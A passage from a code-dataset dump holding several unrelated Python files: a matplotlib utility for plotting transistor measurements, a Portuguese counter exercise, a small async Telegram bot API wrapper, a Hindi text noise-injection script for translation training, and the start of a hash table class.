y1, pointsPerX1 = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='drain current', scaleYaxisBy=1000, derivative=True, absoluteValue=True, reciprocal=True, logScale=True)\n\tx2, y2, pointsPerX2 = extractSweep(axis, jsonData, direction, x_data=x_axis, \t\t y_data='drain current', derivative=True)\n\tx2 = np.abs(x2) if(absoluteXaxis) else (x2)\n\ty1 = scaleYaxisBy*np.array(y1)\n\tline = plotAll(axis, x2, y1, lineColor, pointsPerX=pointsPerX1, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\t\ndef plotHysteresisCurve(axis, jsonData, lineColor, scaleYaxisBy=1, lineStyle=None, errorBars=True):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction='both', x_data='gate voltage', y_data='drain current')\n\tvgs_fwd, vgs_rev, id_fwd, id_rev = x[0], x[1], y[0], y[1]\n\t\n\thysteresis_extraction = fet_model.FET_Hysteresis(vgs_fwd, id_fwd, vgs_rev, id_rev, noise_floor=1e-10)\n\tvgs_region = hysteresis_extraction['V_GS']\n\thysteresis = hysteresis_extraction['H']\n\t\n\tline = axis.plot(vgs_region, np.array(hysteresis) * scaleYaxisBy, color=lineColor, marker='o', markersize=2, linewidth=(0 if(lineStyle == '') else 1))[0]\t\t\t\t\n\treturn line\n\n# === Parameter Plots ===\ndef plotSweepParameters(axis, lineColor, start, end, points, duplicates, ramps, time_offset=0):\n\tsweep_waveform = dgu.sweepValuesWithDuplicates(start, end, points*2*duplicates, duplicates, ramps)\n\tsweep_waveform = [item for sublist in sweep_waveform for item in sublist]\n\ttime_waveform = np.linspace(time_offset, time_offset+1, len(sweep_waveform))\n\t\n\taxis.set_yticks([start, 0, end])\n\taxis.set_xticks([0, time_offset+1])\n\taxis.set_xticklabels(['Start', 'End'])\n\t\n\tline = axis.plot(time_waveform, sweep_waveform, color=lineColor, marker='o', markersize=2, linewidth=1)[0]\t\t\t\t\n\treturn line\n\ndef plotStaticParameter(axis, lineColor, value, duration, measurementTime, time_offset=0):\n\ttime_waveform = np.linspace(time_offset, time_offset+duration, max(int(duration/measurementTime)+1, 2))\n\tline = axis.plot(time_waveform, [value]*len(time_waveform), color=lineColor, marker='o', markersize=2, linewidth=1)[0]\t\t\t\t\n\treturn line\n\ndef plotRapidParameter(axis, lineColor, waveform, values, points, maxStep, other_length=0):\n\tvalues = values if(len(values) >= other_length) else values + [values[-1]]*(other_length-len(values))\n\tvalue_waveform = dgu.waveformValues(waveform, values, points, maxStep)\n\ttime_waveform = np.linspace(0, 1, len(value_waveform))\n\t\n\taxis.set_xticks([0, 1])\n\taxis.set_xticklabels(['Start', 'End'])\n\t\n\tline = axis.plot(time_waveform, value_waveform, color=lineColor, marker='o', markersize=2, linewidth=1)[0]\t\t\t\t\n\treturn line\n\ndef plotSmallSignalParameter(axis, lineColor, offset, amplitude, periods, points, frequencies):\n\tline = None\n\ttime_start = 0\n\tfor frequency in frequencies:\n\t\tvalue_waveform = dgu.sineValues(offset, amplitude, periods, points*periods)\n\t\ttime_waveform = np.linspace(time_start, time_start + periods/frequency, len(value_waveform))\n\t\t\n\t\tline = axis.plot(time_waveform, value_waveform, color=lineColor, marker='o', markersize=2, linewidth=1)[0]\t\t\n\t\ttime_start = time_waveform[-1]\n\treturn line\n\n# === Figures ===\ndef initFigure(rows, columns, figsizeDefault, figsizeOverride=None, shareX=False, subplotWidthRatio=None, subplotHeightRatio=None):\n\tfigsize = figsizeDefault\n\tif(figsizeOverride != None):\n\t\tfigsize = figsizeOverride\n\n\tif(rows > 1 or columns > 1):\n\t\tfig, axes = plt.subplots(rows, columns, figsize=figsize, sharex=shareX, gridspec_kw={'width_ratios':subplotWidthRatio, 'height_ratios':subplotHeightRatio})\n\telse:\n\t\tfig, axes = plt.subplots(rows, columns, figsize=figsize)\n\n\treturn fig, axes\n\ndef adjustAndSaveFigure(figure, plotType, mode_parameters, subplotWidthPad=0, subplotHeightPad=0):\n\t# figure.align_labels()\n\tfigure.tight_layout()\n\tplt.subplots_adjust(wspace=subplotWidthPad, hspace=subplotHeightPad)\n\tpngDPI = (600) if(mode_parameters['publication_mode']) else (mode_parameters['default_png_dpi'])\n\tif(mode_parameters['saveFigures']):\n\t\tprint('[MPL]: Saving figures.')\n\t\tstart = time.time()\n\t\tif isinstance(mode_parameters['plotSaveName'], io.BytesIO):\n\t\t\tplt.savefig(mode_parameters['plotSaveName'], transparent=True, dpi=pngDPI, format='png')\n\t\telse:\n\t\t\tplt.savefig(os.path.join(mode_parameters['plotSaveFolder'], mode_parameters['plotSaveName'] + plotType + mode_parameters['plotSaveExtension']), transparent=True, dpi=pngDPI)\n\t\tend = time.time()\n\t\tprint('[MPL]: Figures saved. (Seconds elapsed: {:.3f} s)'.format(end-start))\n\tif(not mode_parameters['showFigures']):\n\t\tprint('[MPL]: Closing figures.')\n\t\tplt.close(figure)\n\n\n\n\n# === Plots ===\ndef plotWithErrorBars(axis, x, y, lineColor, pointsPerX, errorBars=True, alpha=1):\n\tx_unique, avg, std = avgAndStdAtEveryPoint(x, y, pointsPerX)\n\tif(not errorBars):\n\t\tstd=None\n\treturn axis.errorbar(x_unique, avg, yerr=std, color=lineColor, linewidth=1, capsize=2, capthick=0.5, elinewidth=0.5, alpha=alpha)[0]\n\ndef plotOverTime(axis, timestamps, y, lineColor, offset=0, markerSize=1, lineWidth=1, lineStyle=None, plotInnerGradient=False, innerGradientColors=None):\n\tzeroed_timestamps = list( np.array(timestamps) - timestamps[0] + offset )\n\tif(not plotInnerGradient):\n\t\treturn axis.plot(zeroed_timestamps, y, color=lineColor, marker='o', markersize=markerSize, linewidth=lineWidth, linestyle=lineStyle)[0]\n\telse:\n\t\tN = len(y)//20\n\t\tif N < 1:\n\t\t\tN = 1\n\t\tfor i in range(0, len(y)-1, N):\n\t\t\tp = axis.plot(zeroed_timestamps[i:i+1+N], y[i:i+1+N], color=innerGradientColors[i])\n\t\treturn p[0]\n\ndef boxplot(axis, data):\n\treturn axis.boxplot(data, meanline=True, showmeans=True, showfliers=False, medianprops={'color':'#000000'}, meanprops={'color':'#000000'})\n\n\n\n# === Colors ===\ndef setupColors(fig, numberOfColors, colorOverride=[], colorDefault=['#1f77b4', '#f2b134', '#4fb99f', '#ed553b', '#56638A'], colorMapName='plasma', colorMapStart=0, colorMapEnd=0.87, enableColorBar=False, colorBarTicks=[0,1], colorBarTickLabels=['End','Start'], colorBarAxisLabel=''):\n\tif(isinstance(colorOverride, tuple)):\n\t\tcolorMapName = colorOverride[0]\n\t\tcolorMapStart = colorOverride[1]\n\t\tcolorMapEnd = colorOverride[2]\n\telif(numberOfColors == len(colorOverride)):\n\t\treturn colorOverride\n\n\tcolors = None\n\tif(numberOfColors <= len(colorDefault)):\n\t\tcolors = colorDefault.copy()\n\telse:\n\t\tcolorMap = colorsFromMap(colorMapName, colorMapStart, colorMapEnd, numberOfColors)\n\t\tcolors = colorMap['colors']\n\t\tif(enableColorBar and numberOfColors >= 5):\n\t\t\tcolorBar(fig, colorMap['smap'], ticks=colorBarTicks, tick_labels=colorBarTickLabels, axisLabel=colorBarAxisLabel)\n\n\t#for color in colors:\n\t#\tprint(pltc.to_hex(color))\n\n\treturn colors\n\ndef colorsFromMap(mapName, colorStartPoint, colorEndPoint, numberOfColors):\n\tscalarColorMap = cm.ScalarMappable(norm=pltc.Normalize(vmin=0, vmax=1.0), cmap=mapName)\n\treturn {'colors':[scalarColorMap.to_rgba(i) for i in np.linspace(colorStartPoint, colorEndPoint, numberOfColors)], 'smap':scalarColorMap}\n\ndef colorBar(fig, scalarMappableColorMap, ticks=[0,1], tick_labels=['End','Start'], axisLabel='Time'):\n\tscalarMappableColorMap._A = []\n\tcbar = fig.colorbar(scalarMappableColorMap, pad=0.02, aspect=50)\n\tcbar.set_ticks(ticks)\n\tcbar.ax.set_yticklabels(tick_labels, rotation=270)\n\tcbar.ax.yaxis.get_majorticklabels()[0].set_verticalalignment('bottom')\n\tcbar.ax.yaxis.get_majorticklabels()[-1].set_verticalalignment('top')\n\tif len(ticks) > 2:\n\t\tfor i in range(len(ticks) - 2):\n\t\t\tcbar.ax.yaxis.get_majorticklabels()[i+1].set_verticalalignment('center')\n\tcbar.set_label(axisLabel, rotation=270, labelpad=0.9)\n\n\n\n# === Labels ===\ndef setLabel(line, label):\n\tline.set_label(label)\n\ndef semiLogScale(axis):\n\taxis.set_yscale('log')\n\ndef axisLabels(axis, x_label=None, y_label=None):\n\tif(x_label is not None):\n\t\taxis.set_xlabel(x_label)\n\tif(y_label is not None):\n\t\taxis.set_ylabel(y_label)\n\ndef axisColors(axis, x_color=None, y_color=None):\n\tif(x_color is not None):\n\t\taxis.xaxis.label.set_color(x_color)\n\t\taxis.tick_params(axis='x', colors=x_color)\n\tif(y_color is not None):\n\t\taxis.yaxis.label.set_color(y_color)\n\t\taxis.tick_params(axis='y', colors=y_color)\n\ndef tickLabels(axis, labelList, rotation=0):\n\taxis.set_xticklabels(labelList)\n\taxis.set_xticks(range(len(labelList)))\n\taxis.xaxis.set_tick_params(rotation=rotation)\n\ndef includeOriginOnYaxis(axis, include=True, stretchfactor=1):\n\tif(include):\n\t\tif(axis.get_ylim()[1] < 0):\n\t\t\taxis.set_ylim(top=0)\n\t\telif(axis.get_ylim()[0] > 0):\n\t\t\taxis.set_ylim(bottom=0)\n\taxis.set_ylim(bottom=axis.get_ylim()[0]*stretchfactor, top=axis.get_ylim()[1]*stretchfactor)\n\ndef includeOriginOnXaxis(axis, include=True, stretchfactor=1):\n\tif(include):\n\t\tif(axis.get_xlim()[1] < 0):\n\t\t\taxis.set_xlim(right=0)\n\t\telif(axis.get_xlim()[0] > 0):\n\t\t\taxis.set_xlim(left=0)\n\taxis.set_xlim(left=axis.get_xlim()[0]*stretchfactor, right=axis.get_xlim()[1]*stretchfactor)\n\ndef includeAtLeastOrderOfMagnitudeOnYaxis(axis, include=True, stretchfactor=5, cutoff=25):\n\tif(include):\n\t\tif(axis.get_ylim()[1]/axis.get_ylim()[0] < cutoff):\n\t\t\taxis.set_ylim(bottom=axis.get_ylim()[0]/stretchfactor, top=axis.get_ylim()[1]*stretchfactor)\n\ndef getTestLabel(deviceHistory, identifiers):\n\tif(identifiers is None):\n\t\treturn ''\n\n\tlabel = str(identifiers['wafer']) + str(identifiers['chip']) + ':' + identifiers['device']\n\tif len(deviceHistory) > 0:\n\t\ttest1Num = deviceHistory[0]['experimentNumber']\n\t\ttest2Num = deviceHistory[-1]['experimentNumber']\n\t\tif test1Num == test2Num:\n\t\t\tlabel += ', Test {:}'.format(test1Num)\n\t\telse:\n\t\t\tlabel += ', Tests {:}-{:}'.format(test1Num, test2Num)\n\treturn label\n\n\n\n# === Legend ===\ndef addLegend(axis, loc, title, mode_parameters=None):\n\tif((mode_parameters is not None) and (mode_parameters['enableLegend'] == False)):\n\t\treturn\n\tlines, labels = axis.get_legend_handles_labels()\n\taxis.legend(lines, labels, loc=loc, title=title, labelspacing=(0) if(len(labels) == 0) else (0.3))\n\n# Helper. Will return list of indices with all occurances of min value, and min value.\ndef minIndicesAndValue(lst):\n\tminValue = lst[0]\n\tminIndices = [0]\n\tfor i in range(1, len(lst)):\n\t\tif lst[i] < minValue:\n\t\t\tminValue = lst[i]\n\t\t\tminIndices = [i]\n\t\telif lst[i] == minValue:\n\t\t\tminIndices.append(i)\n\treturn (minIndices, minValue)\n\ndef maxIndicesAndValue(lst):\n\tmaxValue = lst[0]\n\tmaxIndices = [0]\n\tfor i in range(1, len(lst)):\n\t\tif lst[i] > maxValue:\n\t\t\tmaxValue = lst[i]\n\t\t\tmaxIndices = [i]\n\t\telif lst[i] == maxValue:\n\t\t\tmaxIndices.append(i)\n\treturn (maxIndices, maxValue)\n\ndef getLegendTitle(deviceHistory, identifiers, plottype_parameters, parameterSuperType, parameterType, mode_parameters=None, current_scale=1, voltage_scale=1, includeDataMin=False, includeDataMax=False, includeVgsChange=False, includeVdsSweep=False, includeVgsSweep=False, includeVdsHold=False, includeVgsHold=False, includeIdHold=False, includeIgHold=False, includeTimeHold=False, includeChannelLength=False):\n\tlegend_title = ''\n\tlegend_entries = []\n\t\n\t# SNR\n\tif(includeDataMin):\n\t\trawXData = getParameterArray(deviceHistory, 'Results', '', 'vgs_data_to_plot')[0]\n\t\trawYData = getParameterArray(deviceHistory, 'Results', '', 'snr_to_plot')[0]\n\t\txData = []\n\t\tyData = []\n\t\tfor sublist in rawXData:\n\t\t\txData = xData + sublist\n\t\tfor sublist in rawYData:\n\t\t\tyData = yData + sublist\n\t\tif len(xData) > 0 and len(yData) > 0:\n\t\t\t(minIndices, minValue) = minIndicesAndValue(yData)\n\t\telse:\n\t\t\tminIndices = []\n\t\tcorrespondingXValues = [xData[i] for i in minIndices]\n\t\tfor x in correspondingXValues:\n\t\t\tlegend_entries.append('Min = ' + plottype_parameters['leg_data_min_x'].format(round(x, 2)) + ', ' + plottype_parameters['leg_data_min_y'].format(round(minValue, 2)))\n\tif(includeDataMax):\n\t\trawXData = getParameterArray(deviceHistory, 'Results', '', 'vgs_data_to_plot')[0]\n\t\trawYData = getParameterArray(deviceHistory, 'Results', '', 'snr_to_plot')[0]\n\t\txData = []\n\t\tyData = []\n\t\tfor sublist in rawXData:\n\t\t\txData = xData + sublist\n\t\tfor sublist in rawYData:\n\t\t\tyData = yData + sublist\n\t\tif len(xData) > 0 and len(yData) > 0:\n\t\t\t(maxIndices, maxValue) = maxIndicesAndValue(yData)\n\t\telse:\n\t\t\tmaxIndices = []\n\t\tcorrespondingXValues = [xData[i] for i in maxIndices]\n\t\tfor x in correspondingXValues:\n\t\t\tlegend_entries.append('Max = ' + plottype_parameters['leg_data_max_x'].format(round(x, 2)) + ', ' + plottype_parameters['leg_data_max_y'].format(round(maxValue, 2)))\n\tif(includeVgsChange):\n\t\tvgs_max = getParameterArray(deviceHistory, 'runConfigs', 'GateSweep', 'gateVoltageMaximum')\n\t\tvgs_min = getParameterArray(deviceHistory, 'runConfigs', 'GateSweep', 'gateVoltageMinimum')\n\t\tvgs_steps = getParameterArray(deviceHistory, 'runConfigs', 'GateSweep', 'stepsInVGSPerDirection')\n\t\tvgs_change = (vgs_max[0] - vgs_min[0])/(vgs_steps[0] - 1)\n\t\tlegend_entries.append(plottype_parameters['leg_vgs_change'].format(round(vgs_change, 2)))\n\t\n\t# GateSweep\n\tif(includeVdsSweep):\n\t\tvds_list = getParameterArray(deviceHistory, parameterSuperType, parameterType, 'drainVoltageSetPoint')\n\t\tvds_min = min(vds_list) * voltage_scale\n\t\tvds_max = max(vds_list) * voltage_scale\n\t\tlegend_entries.append(plottype_parameters['leg_vds_label'].format(vds_min) if(vds_min == vds_max) else (plottype_parameters['leg_vds_range_label'].format(vds_min, vds_max)))\n\t\n\t# DrainSweep\n\tif(includeVgsSweep):\n\t\tvgs_list = getParameterArray(deviceHistory, parameterSuperType, parameterType, 'gateVoltageSetPoint')\n\t\tvgs_min = min(vgs_list) * voltage_scale\n\t\tvgs_max = max(vgs_list) * voltage_scale\n\t\tlegend_entries.append(plottype_parameters['leg_vgs_label'].format(vgs_min) if(vgs_min == vgs_max) else (plottype_parameters['leg_vgs_range_label'].format(vgs_min, vgs_max)))\n\t\n\t# StaticBias/StaticCurrent\n\tif(includeVdsHold):\n\t\tlegend_entries.append(plottype_parameters['vds_legend'].format(deviceHistory[0][parameterSuperType][parameterType]['drainVoltageSetPoint'] * voltage_scale))\n\tif(includeVgsHold):\n\t\tlegend_entries.append(plottype_parameters['vgs_legend'].format(deviceHistory[0][parameterSuperType][parameterType]['gateVoltageSetPoint'] * voltage_scale))\n\tif(includeIdHold):\n\t\tlegend_entries.append(plottype_parameters['id_legend'].format(deviceHistory[0][parameterSuperType][parameterType]['drainCurrentSetPoint'] * current_scale))\n\tif(includeIgHold):\n\t\tlegend_entries.append(plottype_parameters['ig_legend'].format(deviceHistory[0][parameterSuperType][parameterType]['gateCurrentSetPoint'] * current_scale))\n\tif(includeTimeHold):\n\t\tlegend_entries.append(plottype_parameters['t_legend'].format(timeWithUnits(np.mean([jsonData[parameterSuperType][parameterType]['totalBiasTime'] for jsonData in deviceHistory]))))\n\t\n\t# Channel length from wafer.json info file\n\tif(includeChannelLength):\n\t\tif((mode_parameters is not None) and (mode_parameters['generalInfo'] is not None)):\n\t\t\ttry:\n\t\t\t\twafer_info = mode_parameters['generalInfo']\n\t\t\t\tL_ch = wafer_info['channel_length_nm'][identifiers['chip']][identifiers['device']] if(identifiers['chip'] in wafer_info['channel_length_nm']) else wafer_info['channel_length_nm'][identifiers['device']]\n\t\t\t\tif(L_ch < 1000):\n\t\t\t\t\tlegend_entries.append('$L_{{ch}} = $ {:} nm'.format(L_ch))\n\t\t\t\telse:\n\t\t\t\t\tlegend_entries.append('$L_{{ch}} = $ {:.1f} $\\\\mu$m'.format(L_ch/1000))\n\t\t\texcept:\n\t\t\t\tprint('Unable to find L_ch for device: ' + str(identifiers) + ' in the provided wafer.json.')\n\n\t# Override\n\tif((mode_parameters is not None) and (mode_parameters['legendTitleOverride'] != '')):\n\t\tlegend_entries = [mode_parameters['legendTitleOverride']]\n\n\t# Concatentate legend entries with new lines\n\tfor i in range(len(legend_entries)):\n\t\tif(i != 0):\n\t\t\tlegend_title += '\\n'\n\t\tlegend_title += legend_entries[i]\n\n\treturn legend_title\n\n\n\n# === Curve Fitting ===\n\n## EXAMPLE ##\n#for deviceRun in deviceHistory:\n#\tstartIndex, endIndex = steepestRegion(np.log10(np.abs(deviceRun['Results']['id_data'][0])), 10)\n#\tvgs_region = deviceRun['Results']['vgs_data'][0][startIndex:endIndex]\n#\tid_region = deviceRun['Results']['id_data'][0][startIndex:endIndex]\n#\tfitted_region = semilogFit(vgs_region, id_region)['fitted_data']\n#\tSS_list.append(avgSubthresholdSwing(vgs_region, fitted_region))\n#\taxis.plot(vgs_region, fitted_region, color='b', linestyle='--')\n#SS_avg = np.mean(SS_list)\n\ndef linearFit(x, y):\n\tslope, intercept = np.polyfit(x, y, 1)\n\tfitted_data = [slope*x[i] + intercept for i in range(len(x))]\n\treturn {'fitted_data': fitted_data,'slope':slope, 'y_intercept':intercept, 'x_intercept':-intercept/slope}\n\ndef quadraticFit(x, y):\n\ta, b, c = np.polyfit(x, y, 2)\n\tfitted_data = [(a*(x[i]**2) + b*x[i] + c) for i in range(len(x))]\n\treturn {'fitted_data': fitted_data, 'a':a, 'b':b, 'c':c}\n\ndef semilogFit(x, y):\n\tfit_results = linearFit(x, np.log10(np.abs(y)))\n\tfitted_data = [10**(fit_results['fitted_data'][i]) for i in range(len(fit_results['fitted_data']))]\n\treturn {'fitted_data': fitted_data}\n\ndef steepestRegion(data, numberOfPoints):\n\tmaxSlope = 0\n\tindex = 0\n\tfor i in range(len(data) - 1):\n\t\tdiff = abs(data[i] - data[i+1])\n\t\tif(diff > maxSlope):\n\t\t\tmaxSlope = diff\n\t\t\tindex = i\n\tregionStart = max(0, index - numberOfPoints/2)\n\tregionEnd = min(len(data)-1, index + numberOfPoints/2)\n\treturn (int(regionStart), int(regionEnd))\n\n\n\n# === Metrics ===\ndef avgSubthresholdSwing(vgs_data, id_data):\n\treturn (abs( (vgs_data[0] - vgs_data[-1]) / (np.log10(np.abs(id_data[0])) - np.log10(np.abs(id_data[-1]))) ) * 1000)\n\n\n\n# === Statistics ===\ndef avgAndStdAtEveryPoint(x, y, pointsPerX):\n\tx_uniques = []\n\ty_averages = []\n\ty_standardDeviations = []\n\ti = 0\n\twhile (i < len(y)):\n\t\tj = i+pointsPerX\n\t\tx_uniques.append(x[i])\n\t\ty_averages.append(np.mean(y[i:j]))\n\t\ty_standardDeviations.append(np.std(y[i:j]))\n\t\ti = j\n\n\treturn (x_uniques, y_averages, y_standardDeviations)\n\ndef nextIndexToBeDifferent(data, i):\n\tvalue = data[i]\n\twhile((i < len(data)) and (data[i] == value)):\n\t\ti += 1\n\treturn i\n\ndef secondsPer(amountOfTime):\n\tif(amountOfTime == 'seconds'):\n\t\treturn 1\n\telif(amountOfTime == 'min'):\n\t\treturn 60\n\telif(amountOfTime == 'hr'):\n\t\treturn 3600\n\telif(amountOfTime == 'days'):\n\t\treturn 3600*24\n\telif(amountOfTime == 'weeks'):\n\t\treturn 3600*24*7\n\telif(amountOfTime == 'months'):\n\t\treturn 3600*24*30\n\telse:\n\t\treturn 0\n\ndef timeWithUnits(seconds):\n\ttime = seconds\n\tunit = 's'\n\tthreshold = 2\n\n\tif seconds >= 60*60*24*30:\n\t\ttime = seconds/(60*60*24*30)\n\t\tunit = 'month'\n\telif seconds >= 60*60*24*7:\n\t\ttime = seconds/(60*60*24*7)\n\t\tunit = 'wk'\n\telif seconds >= 60*60*24:\n\t\ttime = seconds/(60*60*24)\n\t\tunit = 'day' if int(time) == 1 else 'days'\n\telif seconds >= 60*60:\n\t\ttime = seconds/(60*60)\n\t\tunit = 'hr'\n\telif seconds >= 60:\n\t\ttime = seconds/(60)\n\t\tunit = 'min'\n\telif seconds >= 60:\n\t\ttime = seconds/(1)\n\t\tunit = 's'\n\n\treturn '{} {}'.format(int(time), unit)\n\ndef bestTimeScaleFor(seconds):\n\tif(seconds < 2*60):\n\t\treturn 'seconds'\n\telif(seconds < 2*60*60):\n\t\treturn 'min'\n\telif(seconds < 2*60*60*24):\n\t\treturn 'hr'\n\telif(seconds < 2*60*60*24*7):\n\t\treturn 'days'\n\telif(seconds < 2*60*60*24*30):\n\t\treturn 'weeks'\n\telse:\n\t\treturn 'months'\n\n\n\n# === Data Manipulation ===\ndef flatten(dataList):\n\tdata = list([dataList])\n\twhile(isinstance(data[0], list)):\n\t\tdata = [(item) for sublist in data for item in sublist]\n\treturn data\n\ndef scaledData(deviceHistory, dataSubdirectory, dataToScale, scalefactor):\n\tdata = list(deviceHistory)\n\tfor i in range(len(data)):\n\t\tdata_entry = data[i][dataSubdirectory][dataToScale]\n\t\tif(isinstance(data_entry[0], list)):\n\t\t\tfor j in range(len(data_entry)):\n\t\t\t\tdata_entry[j] = list(np.array(data_entry[j])*scalefactor)\n\t\telse:\n\t\t\tdata_entry = list(np.array(data_entry)*scalefactor)\n\t\tdata[i][dataSubdirectory][dataToScale] = data_entry\n\treturn data\n\ndef getParameterArray(deviceHistory, parameterSuperType, parameterSubType, parameterName):\n\tresult = []\n\tfor i in range(len(deviceHistory)):\n\t\telement = deviceHistory[i]\n\t\tif(parameterSuperType != ''):\n\t\t\telement = element[parameterSuperType]\n\t\tif(parameterSubType != ''):\n\t\t\telement = element[parameterSubType]\n\t\tresult.append(element[parameterName])\n\treturn result\n","repo_name":"stevennoyce/AutexysHost","sub_path":"source/utilities/MatplotlibUtility.py","file_name":"MatplotlibUtility.py","file_ext":"py","file_size_in_byte":39184,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"21254052332","text":"from time import sleep\n\ntitulo = str(input('\\nDefina um título: '))\nsleep(0.5)\nprint(f'\\n\\033[32m{titulo:•^50}\\033[m') # Centralizado.\nsleep(0.5)\nprint(f'\\n\\033[33m{titulo:.>50}\\033[m') # Direita.\nsleep(0.5)\nprint(f'\\n\\033[34m{titulo:_<50}\\033[m') # Esquerda.\n\n# Contador Manual.\nn = int(input('\\nAté quanto você deseja contar: '))\nprint('\\033[32m')\nfor i in range(n + 1):\n sleep(0.3)\n print(i)\nprint('\\033[m')\n\n# Contador com Ponto Incial & Final.\na = int(input('Ponto Inicial: '))\nb = int(input('Ponto Final: '))\nprint('\\033[33m')\nc = range(a, b + 1)\nfor d in c:\n sleep(0.3)\n print(d)\nprint('\\033[m')\n\n# Contador Infinito.\nx = -1\nwhile True:\n x > 0\n x = x + 1\n sleep(0.3)\n print(f'\\033[31m{x}\\033[m')","repo_name":"jonathansilveira1987/MACETES","sub_path":"PYTHON/contar.py","file_name":"contar.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23901959364","text":"from traceback import print_exc\nimport aiohttp\nfrom typing import Union\nfrom types import MethodType\n\nurl = \"https://api.telegram.org\"\n\ndef snake_case_to_camel_case(shake_case_str:str):\n return \"\".join((symb.capitalize() for symb in shake_case_str.split(\"_\")))\n\nclass TelegramError(Exception): pass\n\nclass LightTelegramBotError(Exception):\n def __init__(self):\n self.args = (\"Inner light_telegram_bot error\",)\n\nclass LightTelegramBotPollingError(Exception):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.args = (*self.args, \"Polling error\")\n\nclass NextHandler(Exception):\n def __init__(self):\n self.args = (\"don't use this error outside of light_telegram_bot handler\",)\n\nclass Bot:\n def __init__(self, token: str):\n self._http_exceptions = {}\n self._token = token\n self.cache = {}\n\n async def __new__(cls, *args, **kwargs):\n obj = super().__new__(cls)\n obj._session = aiohttp.ClientSession(url)\n obj.__init__(*args, **kwargs)\n return obj\n\n def __getattr__(self, attr: str):\n if attr in self.cache:\n return self.cache[attr]\n\n url = \"/bot\"+self._token+\"/\"+snake_case_to_camel_case(attr)\n async def function(bot, **kwargs):\n async with bot._session.get(url, params=kwargs) as response:\n response_data = await response.json()\n if response_data[\"ok\"]:\n return response_data[\"result\"]\n else:\n raise bot.get_http_exception(response_data[\"error_code\"])(\n response_data[\"description\"]\n )\n\n function.__name__ = attr\n function.__qualname__ = self.__class__.__qualname__ + \".\" + attr\n method = MethodType(function, self)\n self.cache[attr] = method\n return method\n\n def get_http_exception(self, number:int):\n if number in self._http_exceptions:\n return self._http_exceptions[number]\n else:\n HttpException = type(f\"TelegramError{number}\", (TelegramError,), {})\n self._http_exceptions[number] = HttpException\n return HttpException\n\n\nclass BotPolling:\n def __init__(self, bot, start_offset=0):\n self._handlers = []\n self._bot = bot\n self._offset = start_offset\n\n async def start(self, timeout=60, **kwargs):\n try:\n while 1:\n updates = await self._bot.get_updates(timeout=timeout, offset=self._offset, **kwargs)\n if updates:\n self._offset = updates[-1][\"update_id\"]+1\n for update in updates:\n for handler in self._handlers:\n try:\n await handler(update)\n except NextHandler:\n pass\n else:\n break\n except Exception:\n print_exc()\n raise LightTelegramBotPollingError()\n \n def handler(self, f):\n self._handlers.append(f)\n ","repo_name":"Chebotarev-Alexey/light_telegram_bot","sub_path":"light_telegram_bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"5319719119","text":"import random\nimport argparse\nfrom tqdm import tqdm\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='Add noise to sentences in a file')\nparser.add_argument('input_file', type=str, help='Path to the input file')\nparser.add_argument('output_file', type=str, help='Path to the output file')\nparser.add_argument('--noisy_ratio', type=float, default=0.1, help='Ratio of sentences to add noise to (default: 0.1)')\nparser.add_argument('--random_seed', type=int, default=42, help='Random seed for generating noise (default: 42)')\n\nargs = parser.parse_args()\n\n# Now you can access the arguments using the variable 'args'\ninput_file_path = args.input_file\noutput_file_path = args.output_file\nnoisy_ratio = args.noisy_ratio\nrandom_seed = args.random_seed\n\n\ndef insert_char(s):\n \"\"\"Insert a random character in the given string\"\"\"\n char = chr(random.randint(2304, 2431)) # Choose a random Hindi character code\n pos = random.randint(0, len(s))\n #print(\"insertion\",char)\n\n return s[:pos] + char + s[pos:]\n\ndef substitute_char(s):\n \"\"\"Substitute a random character in the given string\"\"\"\n char = chr(random.randint(2304, 2431)) # Choose a random Hindi character code\n pos = random.randint(0, len(s)-1)\n #print(\"subti\",char)\n return s[:pos] + char + s[pos+1:]\n\ndef delete_char(s):\n \"\"\"Delete a random character in the given string\"\"\"\n pos = random.randint(0, len(s)-1)\n #print(\"del\")\n return s[:pos] + s[pos+1:]\n\ndef inject_noise(s):\n \"\"\"Inject character-level noise in the given Hindi sentence\"\"\"\n words = s.split()\n num_noisy_words = max(1, round(len(words) / 10)) # Choose at least 1 word to add noise to\n noisy_word_indices = random.sample(range(len(words)), num_noisy_words)\n #print(noisy_word_indices)\n for idx in noisy_word_indices:\n word = words[idx]\n #num_ops = random.randint(1, 3) # Choose a random number of operations to perform (1 to 3)\n #print(num_ops)\n #for i in range(num_ops):\n op = random.randint(1, 3) # Choose a random operation (1: insertion, 2: substitution, 3: deletion)\n if op == 1:\n word = insert_char(word)\n elif op == 2:\n word = substitute_char(word)\n elif op == 3:\n word = delete_char(word)\n words[idx] = word\n return ' '.join(words)\n\n\n# Read input file and add noise to sentences\nwith open(input_file_path, \"r\", encoding=\"utf-8\") as input_file, open(output_file_path, \"w\", encoding=\"utf-8\") as output_file:\n for line in tqdm(input_file):\n noisy_line = inject_noise(line.strip())\n output_file.write(noisy_line + \"\\n\")","repo_name":"ShreySatapara/NMT-for-Low-Resource-Languages","sub_path":"noice_injection_hindi.py","file_name":"noice_injection_hindi.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15038476459","text":"\"\"\"\r\nAuthor: Gray A. LeCompte\r\nDate: 20 November 2017\r\nDescription: Implements chaining and probing hash table classes\r\n\"\"\"\r\n\r\nfrom BinaryTree import BinarySearchTree\r\n\r\nclass HashTableBST():\r\n \"\"\"\r\n Creates a hash table, uses chaining (Binary Search Tree from BST class) for collision resolution\r\n param: size of the the hash table, if no size is given default size is set to prime number\r\n \"\"\"\r\n def __init__(self, size = None):\r\n if size is None:\r\n self.__size = 199 # Prime numbers optimal for hash table size\r\n else:\r\n self.__size = size\r\n # Utilizing binary search tree for collision resolution\r\n self.__buckets = []\r\n for i in range(self.__size):\r\n self.__buckets.append(BinarySearchTree())\r\n\r\n def isEmpty(self, value):\r\n 